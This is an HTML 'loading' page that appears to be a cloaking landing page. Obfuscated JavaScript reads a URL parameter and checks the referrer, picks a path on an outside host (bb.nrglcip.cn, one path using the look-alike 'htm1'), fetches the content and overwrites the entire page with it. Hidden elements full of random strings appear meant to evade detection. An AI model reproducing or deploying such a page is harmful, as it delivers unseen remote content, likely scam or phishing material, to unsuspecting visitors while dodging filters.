<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .fBHMrxZf {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .fBHMrxZf .xgKi4qIXfGH {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .fBHMrxZf .content {
            line-height: 50px;
            text-align: center
        }

        .fBHMrxZf .img {
            width: 100%
        }

        .fBHMrxZf .ew7OFd9Ywib {
            text-align: center
        }

        .fBHMrxZf .ew7OFd9Ywib span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .fBHMrxZf .ew7OFd9Ywib span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .fBHMrxZf .ew7OFd9Ywib span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .fBHMrxZf .ew7OFd9Ywib span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .fBHMrxZf .ew7OFd9Ywib span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .fBHMrxZf .ew7OFd9Ywib span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .fBHMrxZf .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function S7TIS4sUPv5Wu(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var drRwS = S7TIS4sUPv5Wu('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ drRwS +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ drRwS +".html?a=share";
		}
		
        A5IyoHI4=url+"#"+new Date().getTime();
        A5IyoHI4 && function() {
            $.get(A5IyoHI4, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<div style='display:none'>AJJcQ3QEZrJ3YlKGd10XDlFbz6DIjDbzoRo3dggVA79xobCvvmu</div>
<img  src='' style='display:none'>
<li style='display:none' >aEWueaVkCtv</li>
<img  src='' style='display:none'>
<span style='display:none'>wlUtfhWWyHZHJd6iaL4AqRzOyVYshMF3fLFfsMzKhleav5Dsn91cHL8tLNLkVHnRWeSzs0pQR</span>
<b style='display:none' >pZwouBXvFIP2f6weEDgf2n1e9cH2aCzv5nAcc4j3vvWk8SiY0tgpcdVGfWpzXVC9ytEcOF8H5VVURIB6lXfPvYwHEQT</b>
<span style='display:none'>wlUtfhWWyHZHJd6iaL4AqRzOyVYshMF3fLFfsMzKhleav5Dsn91cHL8tLNLkVHnRWeSzs0pQR</span>
<li style='display:none' >aEWueaVkCtv</li><div class="fBHMrxZf">
    <div class="xgKi4qIXfGH">
        <div class="ew7OFd9Ywib">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<img  src='' style='display:none'>
<li style='display:none' >eFhbIip8ep53StJPT74jwItd2WVM18RKPDOyBW0fZ0nrydLSq1OqLUpp1rP9qFFsl950Qh4RI65kEUEycy3leAT3nb</li>
<div style='display:none'>dIMCTxVrLJQOxkTKjHmVAg1Ovux4X0JNo6FOkJco4sJDwD2LKqp8nnNjixELyoQpWZqw7wdJ4I4GNfv663NWusuZmT18YCdm7p</div></body>
</html>